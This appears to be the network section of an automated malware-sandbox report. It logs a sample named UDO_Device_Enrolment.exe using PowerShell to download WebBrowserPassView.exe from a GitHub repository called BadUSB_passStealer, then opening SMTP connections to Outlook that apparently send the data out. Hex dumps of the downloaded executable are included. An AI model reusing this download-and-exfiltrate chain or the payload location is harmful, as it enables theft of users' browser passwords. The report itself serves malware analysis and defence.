Sep 25, 2022 20:29:17.601530075 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:17.601547956 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:17.601614952 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.609268904 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.628285885 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:17.638974905 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.657205105 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:17.659447908 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.677433968 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:17.683283091 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.755445957 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:35.846364975 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:35.849992037 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:35.908444881 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:40.876635075 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:40.876657963 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:40.876759052 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:40.884332895 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:40.903450966 CEST	587	49705	52.97.188.70	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2022 20:29:03.276670933 CEST	57840	53	192.168.2.3	8.8.8.8
Sep 25, 2022 20:29:03.298620939 CEST	53	57840	8.8.8.8	192.168.2.3
Sep 25, 2022 20:29:04.315860033 CEST	57990	53	192.168.2.3	8.8.8.8
Sep 25, 2022 20:29:04.335542917 CEST	53	57990	8.8.8.8	192.168.2.3
Sep 25, 2022 20:29:17.423989058 CEST	56924	53	192.168.2.3	8.8.8.8
Sep 25, 2022 20:29:17.452542067 CEST	53	56924	8.8.8.8	192.168.2.3
Sep 25, 2022 20:29:17.475692987 CEST	60625	53	192.168.2.3	8.8.8.8
Sep 25, 2022 20:29:17.502106905 CEST	53	60625	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2022 20:29:03.276670933 CEST	192.168.2.3	8.8.8.8	0xaadd	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:04.315860033 CEST	192.168.2.3	8.8.8.8	0x182c	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:17.423989058 CEST	192.168.2.3	8.8.8.8	0x5d42	Standard query (0)	smtp-mail.outlook.com	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:17.475692987 CEST	192.168.2.3	8.8.8.8	0xcd21	Standard query (0)	smtp-mail.outlook.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 25, 2022 20:29:03.298620939 CEST	8.8.8.8	192.168.2.3	0xaadd	No error (0)	github.com		140.82.121.4	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:04.335542917 CEST	8.8.8.8	192.168.2.3	0x182c	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:04.335542917 CEST	8.8.8.8	192.168.2.3	0x182c	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:04.335542917 CEST	8.8.8.8	192.168.2.3	0x182c	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:04.335542917 CEST	8.8.8.8	192.168.2.3	0x182c	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:17.452542067 CEST	8.8.8.8	192.168.2.3	0x5d42	No error (0)	smtp-mail.outlook.com	svc.ha-smtp.live.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 25, 2022 20:29:17.452542067 CEST	8.8.8.8	192.168.2.3	0x5d42	No error (0)	svc.ha-smtp.live.com		52.97.188.70	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:17.452542067 CEST	8.8.8.8	192.168.2.3	0x5d42	No error (0)	svc.ha-smtp.live.com		52.97.189.102	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:17.452542067 CEST	8.8.8.8	192.168.2.3	0x5d42	No error (0)	svc.ha-smtp.live.com		52.97.189.70	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:17.502106905 CEST	8.8.8.8	192.168.2.3	0xcd21	No error (0)	smtp-mail.outlook.com	svc.ha-smtp.live.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 25, 2022 20:29:17.502106905 CEST	8.8.8.8	192.168.2.3	0xcd21	No error (0)	svc.ha-smtp.live.com		52.97.189.102	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:17.502106905 CEST	8.8.8.8	192.168.2.3	0xcd21	No error (0)	svc.ha-smtp.live.com		52.97.189.70	A (IP address)	IN (0x0001)	false
Sep 25, 2022 20:29:17.502106905 CEST	8.8.8.8	192.168.2.3	0xcd21	No error (0)	svc.ha-smtp.live.com		52.97.188.70	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

raw.githubusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49700	140.82.121.4	443	C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-25 18:29:03 UTC	0	OUT	GET /tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?raw=true HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.17134.1 Host: github.com Connection: Keep-Alive
2022-09-25 18:29:04 UTC	0	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Sun, 25 Sep 2022 18:29:03 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://github.com/tuconnaisyouknow/BadUSB_passStealer/raw/main/other_files/WebBrowserPassView.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-25 18:29:04 UTC	0	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
2022-09-25 18:29:04 UTC	2	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 6f 63 74 6f 3d 47 48 31 2e 31 2e 31 34 36 38 34 38 36 30 39 39 2e 31 36 36 34 31 33 30 35 34 33 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 67 69 74 68 75 62 2e 63 6f 6d 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 32 35 20 53 65 70 20 32 30 32 33 20 31 38 3a 32 39 3a 30 33 20 47 4d 54 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 6f 67 67 65 64 5f 69 6e 3d 6e 6f 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 67 69 74 68 75 62 2e 63 6f 6d 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 32 35 20 53 65 70 20 32 30 32 33 20 31 38 3a 32 39 3a 30 33 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4c Data Ascii: Set-Cookie: _octo=GH1.1.1468486099.1664130543; Path=/; Domain=github.com; Expires=Mon, 25 Sep 2023 18:29:03 GMT; Secure; SameSite=LaxSet-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Mon, 25 Sep 2023 18:29:03 GMT; HttpOnly; Secure; SameSite=L

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49701	140.82.121.4	443	C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-25 18:29:04 UTC	3	OUT	GET /tuconnaisyouknow/BadUSB_passStealer/raw/main/other_files/WebBrowserPassView.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.17134.1 Host: github.com Cookie: _gh_sess=MZmDdE9N3n1fZSys9nAuN8sTDFDwG7U0FgKWhMqqNtlWY62yST4FqHZkoMHKheFDseJfzzCkhFXsGv9MtR%2FEIGIFAiPnJ3d8Gvw4p2BD2QrbWXPVxiZInfPE%2BN%2B1djhqNUB1qgzwq9AQj5gkNyGVZNt5rJDCXdx2Vq0A5N6mLxOqEU8Qy%2BY6zN%2FFRRbMpZw19GiUj6Sm9rJxVxQpWXsw7ldIUUYJDjVVJtM5l3s5AvLm05JNAXbCNDyaHWUafjqf%2BoGyrpKbhx%2BJXHGmDHSbVg%3D%3D--WTlSr%2BGITxfRfJ9w--29doTZR60AO2ufhYeUfmfQ%3D%3D; _octo=GH1.1.1468486099.1664130543; logged_in=no
2022-09-25 18:29:04 UTC	3	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Sun, 25 Sep 2022 18:29:04 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/tuconnaisyouknow/BadUSB_passStealer/main/other_files/WebBrowserPassView.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-25 18:29:04 UTC	4	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49702	185.199.108.133	443	C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-25 18:29:04 UTC	6	OUT	GET /tuconnaisyouknow/BadUSB_passStealer/main/other_files/WebBrowserPassView.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.17134.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2022-09-25 18:29:04 UTC	6	IN	HTTP/1.1 200 OK Connection: close Content-Length: 402944 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "508c5203c8e4fa003fd8f7c87f1538156675e3e7db5143fe88d3598eab2f7ce2" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 083C:1226B:A679F7:B2B386:63309DF0 Accept-Ranges: bytes Date: Sun, 25 Sep 2022 18:29:04 GMT Via: 1.1 varnish X-Served-By: cache-mxp6946-MXP X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1664130544.391393,VS0,VE191 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: 089a1c65bc3cd7060cd39cb3372b9e8ebc8270ec Expires: Sun, 25 Sep 2022 18:34:04 GMT Source-Age: 0
2022-09-25 18:29:04 UTC	7	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 9c f1 af fa fd 9f fc fa fd 9f fc fa fd 9f fc 39 f2 c0 fc f8 fd 9f fc 39 f2 c2 fc ec fd 9f fc 00 de df fc f6 fd 9f fc 20 de 83 fc f1 fd 9f fc fa fd 9e fc ab fc 9f fc 00 de 86 fc f9 fd 9f fc dd 3b ed fc c0 fd 9f fc dd 3b e3 fc fb fd 9f fc dd 3b e7 fc fb fd 9f fc 52 69 63 68 fa fd 9f fc 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8e 68 79 60 00 00 00 00 00 00 00 00 e0 00 03 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$99 ;;;RichPELhy`
2022-09-25 18:29:04 UTC	23	IN	Data Raw: 20 0f 8e d3 00 00 00 81 fb 00 01 00 00 8d 87 40 02 00 00 89 18 76 02 89 18 53 ff 75 ec 8d 87 3f 01 00 00 50 e8 e1 1b 04 00 83 c4 0c 6a 06 68 f0 b4 45 00 56 e8 d7 1b 04 00 83 c4 0c 85 c0 75 4e 81 7d f8 80 00 00 00 0f 8e 8d 00 00 00 c7 87 5c 02 00 00 02 00 00 00 0f b6 46 22 50 89 47 10 8d 46 23 50 8d 47 14 50 e8 9e 1b 04 00 8b 47 10 83 c4 0c 8d 44 30 42 6a 10 50 8d 87 2f 01 00 00 50 e8 85 1b 04 00 8b 47 10 8d 44 30 54 eb 30 6a 06 68 e8 b4 45 00 56 e8 75 1b 04 00 83 c4 0c 85 c0 75 38 0f b6 46 14 50 89 47 10 8d 46 15 50 8d 47 14 50 e8 53 1b 04 00 8b 47 10 8d 44 30 1a 83 c4 0c 6a 10 50 81 c7 1f 01 00 00 57 e8 3a 1b 04 00 c7 45 f4 01 00 00 00 83 c4 0c 8b 7d fc e8 97 21 02 00 8b 7d 08 83 65 fc 00 68 a4 00 00 00 e8 84 1f 00 00 8b 5d 0c 59 8d 4d f8 51 6a 00 6a ff Data Ascii: @vSu?PjhEVuN}\F"PGF#PGPGD0BjP/PGD0T0jhEVuu8FPGFPGPSGD0jPW:E}!}eh]YMQjj
2022-09-25 18:29:04 UTC	39	IN	Data Raw: 89 45 e8 e8 5c f8 ff ff 8b f8 8b f7 8b 4d ec 8b 93 20 02 00 00 83 45 ec 07 8b c1 c1 e8 03 66 8b 04 10 80 e1 07 66 d3 e8 24 7f 88 06 8b 83 28 03 00 00 8d 04 c5 f9 ff ff ff 46 39 45 ec 76 cd 8b 45 e8 89 bb 20 02 00 00 89 83 28 03 00 00 ff 45 f4 8b 45 0c 8b 4d f4 3b 48 0c 0f 8c 12 ff ff ff 8b 45 cc 5f 5e 5b c9 c2 08 00 57 8b f8 8b 81 28 03 00 00 85 c0 75 04 33 c0 5f c3 8b 91 0c 02 00 00 83 fa 0a 74 05 83 fa 0c 75 ec 81 b9 08 02 00 00 00 01 00 00 8b 91 18 02 00 00 53 56 72 47 81 fa b0 04 00 00 75 3c f6 81 2c 03 00 00 02 74 25 83 f8 01 76 15 8b b1 20 02 00 00 80 7e 01 00 75 09 99 2b c2 d1 f8 50 56 eb 31 6a 00 50 ff b1 20 02 00 00 eb 30 99 2b c2 d1 f8 50 ff b1 20 02 00 00 eb 18 52 eb e6 81 c1 20 02 00 00 81 fa b0 04 00 00 75 0e 99 2b c2 d1 f8 50 51 e8 c9 24 00 Data Ascii: E\M Eff$(F9EvE (EEM;HE_^[W(u3_tuSVrGu<,t%v ~u+PV1jP 0+P R u+PQ$
2022-09-25 18:29:04 UTC	55	IN	Data Raw: 00 8b 47 04 6a 00 ff 76 28 e8 c3 e2 ff ff 33 c0 5f 40 5e c2 04 00 55 8b ec b8 18 10 00 00 e8 8d 11 04 00 56 57 8d 7b 08 8b f7 c7 43 04 01 00 00 80 e8 9b eb ff ff 8d 73 28 e8 93 eb ff ff 8d 73 48 e8 8b eb ff ff 8d 73 68 e8 dc e3 ff ff 8b c3 e8 cd fa ff ff 33 f6 56 68 e8 41 45 00 8b c7 e8 6d e2 ff ff 56 68 44 42 45 00 8b c7 e8 60 e2 ff ff 56 68 78 42 45 00 8b c7 e8 53 e2 ff ff 53 e8 ed fb ff ff 8d 4d f8 8d 43 7c 51 89 45 f4 e8 c0 84 ff ff 85 c0 0f 84 8a 00 00 00 39 73 24 89 75 fc 7e 77 8b 4d fc 8d 43 08 e8 2d e3 ff ff 50 8d bd e8 ef ff ff 66 89 b5 e8 ef ff ff e8 04 e0 ff ff 59 8b c7 50 e8 2c 9c 03 00 59 8b c7 50 ff 75 f8 53 e8 0b fe ff ff 8b c7 50 e8 b7 9b 03 00 3b c6 59 7e 2b 03 c0 66 83 bc 05 e6 ef ff ff 2f 74 1e 66 c7 84 05 e8 ef ff ff 2f 00 66 89 b4 05 Data Ascii: Gjv(3_@^UVW{Cs(sHsh3VhAEmVhDBE`VhxBESSMC\|QE9s$u~wMC-PfYP,YPuSP;Y~+f/tf/f
2022-09-25 18:29:04 UTC	71	IN	Data Raw: f7 fe ff ff e8 6c 90 ff ff 8b 86 94 06 00 00 e8 11 d9 ff ff 8b 86 94 06 00 00 6a 01 e8 2c f9 ff ff 5e c3 53 56 57 8b f8 8b 87 a4 06 00 00 33 db 33 f6 39 58 30 7e 4e 8b ce e8 7a a7 ff ff 50 68 e8 4a 45 00 e8 29 5c 03 00 85 c0 59 59 75 2a 8b 87 a4 06 00 00 8d 4e 01 e8 5b a7 ff ff 8b c8 66 83 39 7e 8b 87 94 06 00 00 75 07 6a 01 83 c1 02 eb 01 53 51 e8 14 fb ff ff 8b 87 a4 06 00 00 46 3b 70 30 7c b2 e8 d1 8f ff ff 8b 87 94 06 00 00 89 58 30 8b 8f 94 06 00 00 8b 01 ff 50 70 8b b7 a4 06 00 00 68 f4 4a 45 00 e8 1a a7 ff ff 83 f8 ff 75 43 39 1d 78 ea 45 00 8b b7 94 06 00 00 75 15 8b 86 cc 02 00 00 a3 f8 e9 45 00 c7 05 78 ea 45 00 01 00 00 00 8b 06 8b 7e 30 68 66 07 41 00 8b ce ff 50 74 50 57 53 e8 12 d6 ff ff 50 e8 1b 5c 03 00 83 c4 10 5f 5e 5b e9 77 8f ff ff 56 Data Ascii: lj,^SVW339X0~NzPhJE)\YYu*N[f9~ujSQF;p0\|X0PphJEuC9xEuExE~0hfAPtPWSP\_^[wV
2022-09-25 18:29:04 UTC	87	IN	Data Raw: 00 16 00 00 50 bb ff 00 00 00 8b c3 8d 7c 24 14 e8 70 53 ff ff 59 8d 86 00 14 00 00 50 8b c3 8d bc 24 14 02 00 00 e8 5a 53 ff ff 59 8d 86 00 10 00 00 50 8b c3 8d bc 24 14 0c 00 00 e8 44 53 ff ff 59 8d 86 00 12 00 00 50 8b c3 8d bc 24 14 0e 00 00 e8 2e 53 ff ff 59 8d 86 00 08 00 00 50 b8 ff 03 00 00 8d bc 24 14 04 00 00 e8 15 53 ff ff 59 8d 86 08 18 00 00 50 8d 43 05 8d bc 24 14 10 00 00 e8 fe 52 ff ff 8b 86 00 18 00 00 89 84 24 28 12 00 00 8b 86 04 18 00 00 89 84 24 2c 12 00 00 8b 44 24 10 59 05 5c fb ff ff 50 8d 5c 24 14 e8 8d 02 00 00 5f 5e 5b 8b e5 5d c2 04 00 55 8b ec 83 e4 f8 b8 38 1e 00 00 e8 e2 90 03 00 53 57 8d 44 24 08 8b d9 e8 41 e2 fe ff ff 75 10 b8 ff 00 00 00 8d 7c 24 0c 66 c7 84 24 16 12 00 00 02 00 e8 8f 52 ff ff 59 ff 75 14 b8 ff 00 00 00 Data Ascii: P\|$pSYP$ZSYP$DSYP$.SYP$SYPC$R$($,D$Y\P\$_^[]U8SWD$Au\|$f$RYu
2022-09-25 18:29:04 UTC	103	IN	Data Raw: e8 89 08 33 c0 40 5f 5e 5b c9 c3 55 8b ec 51 51 83 65 fc 00 85 c0 74 0a 8d 4d fc 51 e8 3c ff ff ff 59 8b 45 fc c9 c3 55 8b ec 8b 4d 0c 83 ec 0c 56 8b f0 8b d1 81 e2 00 00 00 ff 33 c0 0b c2 57 74 29 8b 45 08 88 46 08 0f ac c8 08 c1 e9 08 6a 07 8b f9 5a 8a c8 0f ac f8 07 80 c9 80 88 0c 32 c1 ef 07 4a 79 ee 6a 09 58 eb 33 8b 55 08 33 c0 53 8a da 0f ac ca 07 80 cb 80 88 5c 05 f4 c1 e9 07 8b fa 40 0b f9 75 e9 80 65 f4 7f 8d 48 ff 5b eb 08 8a 54 0d f4 88 16 49 46 85 c9 7d f4 5f 5e c9 c3 f7 c1 00 c0 ff ff 75 14 8b d1 c1 ea 07 80 ca 80 80 e1 7f 6a 02 88 10 88 48 01 58 c3 6a 00 51 e8 61 ff ff ff 59 59 c3 55 8b ec 51 51 0f b6 10 84 d2 78 0a 83 66 04 00 89 16 b0 01 c9 c3 40 0f b6 08 84 c9 78 12 83 e2 7f c1 e2 07 0b d1 83 66 04 00 89 16 b0 02 c9 c3 53 40 57 0f b6 38 Data Ascii: 3@_^[UQQetMQ<YEUMV3Wt)EFjZ2JyjX3U3S\@ueH[TIF}_^ujHXjQaYYUQQxf@xfS@W8
2022-09-25 18:29:04 UTC	119	IN	Data Raw: 02 00 00 75 02 33 f6 83 7c 24 14 01 75 25 83 c7 64 85 f6 6a 10 74 0d 68 ff 00 00 00 57 e8 e2 9b 02 00 eb 0c 8b 03 83 c0 18 50 57 e8 da 9b 02 00 83 c4 0c 8b c6 5f 5e 8b e5 5d c3 55 8b ec 51 51 83 65 fc 00 53 56 ff 75 0c 8b 75 08 56 e8 75 12 00 00 8b d8 85 db 59 59 74 29 66 83 7b 16 01 75 07 e8 c9 e0 ff ff eb 1b e8 fd fe ff ff 85 c0 89 45 fc 75 08 53 ff 96 a0 00 00 00 59 8b c3 e8 6d 12 00 00 8b 46 58 eb 0a c7 40 10 01 00 00 00 8b 40 2c 85 c0 75 f2 8b 45 fc 5e 5b c9 c3 51 8b 47 1c 53 56 8b b7 ac 00 00 00 57 89 47 18 e8 5a 30 00 00 8b 97 a8 00 00 00 59 8b d8 e8 e2 e1 ff ff 85 c0 74 1a 85 db 75 16 ff 70 0c 8b 70 08 57 e8 67 ff ff ff 85 f6 59 8b d8 59 8b c6 75 e6 5e 8b c3 5b 59 c3 8b 46 10 83 c0 64 e8 f8 c1 ff ff 8b c8 8b 06 41 83 c0 18 e8 05 c2 ff ff 8b 06 83 Data Ascii: u3\|$u%djthWPW_^]UQQeSVuuVuYYt)f{uEuSYmFX@@,uE^[QGSVWGZ0YtuppWgYYu^[YFdA
2022-09-25 18:29:04 UTC	135	IN	Data Raw: 25 0f b7 4d f4 8d 14 31 3b 55 f8 7f 19 03 c1 66 85 db 0f b7 cb 77 a7 3b 45 f8 7e 1e 68 94 b7 00 00 e9 f0 fe ff ff 68 86 b7 00 00 e9 e6 fe ff ff 68 7f b7 00 00 e9 dc fe ff ff 2b 45 fc c6 07 01 66 89 47 0e 33 c0 5e 5b c9 c3 55 8b ec 83 ec 0c 8a 46 05 53 8b 5e 3c 80 7b 12 00 57 8b 7e 40 88 45 ff 74 1c 8b 53 24 0f b6 c8 2b d1 0f b6 c0 52 03 c7 6a 00 50 e8 8a 5b 02 00 8a 45 ff 83 c4 0c 0f b6 c8 03 f9 8b 4d 08 88 0f c1 e9 03 f6 d1 66 0f b6 c0 6a 04 6a 00 83 e1 01 8d 0c 8d 08 00 00 00 66 03 c8 0f b7 c1 89 45 f8 8d 47 01 50 e8 51 5b 02 00 8b 4d 08 c6 47 07 00 8b 43 24 c1 e8 08 88 47 05 8a 43 24 88 47 06 66 8b 43 24 8b 7d f8 66 2b c7 66 89 46 0e 83 c4 0c 8b c6 e8 99 fd ff ff 8a 45 ff 88 46 05 66 89 7e 0c c6 46 01 00 66 8b 43 20 66 48 66 83 66 10 00 5f 66 89 46 12 Data Ascii: %M1;Ufw;E~hhh+EfG3^[UFS^<{W~@EtS$+RjP[EMfjjfEGPQ[MGC$GC$GfC$}f+fFEFf~FfC fHff_fF
2022-09-25 18:29:04 UTC	151	IN	Data Raw: 94 c0 04 03 3b 5d f8 88 47 1e 0f 8f 6e ff ff ff 33 c0 5f 5e 5b c9 c3 55 8b ec 83 e4 f8 83 ec 50 56 8b 75 08 57 8b f8 0f b7 46 1c 0f b7 57 1c 8b c8 0b ca f6 c1 01 74 0d 83 e0 01 83 e2 01 2b c2 e9 95 01 00 00 f6 c1 0c 0f 84 82 00 00 00 f6 c2 0c 75 08 33 c0 40 e9 7f 01 00 00 a8 0c 75 08 83 c8 ff e9 73 01 00 00 8b c8 23 ca f6 c1 04 75 40 f6 c2 08 75 08 8b 4f 10 8b 7f 14 eb 06 8b 4f 08 8b 7f 0c a8 08 75 08 8b 46 10 8b 76 14 eb 06 8b 46 08 8b 76 0c 3b fe 7f ba 7c c4 3b c8 72 c0 3b fe 7c 06 7f ae 3b c8 77 aa 33 c0 e9 2a 01 00 00 8b 47 10 8b 4e 10 8b 7f 14 8b 76 14 3b fe 7f 93 7c 9d 3b c1 72 99 3b fe 7c df 7f 87 3b c1 eb d7 f6 c1 02 0f 84 dc 00 00 00 f6 c2 02 0f 84 71 ff ff ff a8 02 0f 84 75 ff ff ff 85 db 0f 84 c3 00 00 00 8a 47 1f 3a 43 04 75 1a ff 76 04 ff 76 Data Ascii: ;]Gn3_^[UPVuWFWt+u3@us#u@uOOuFvFv;\|;r;\|;w3*GNv;\|;r;\|;quG:Cuvv
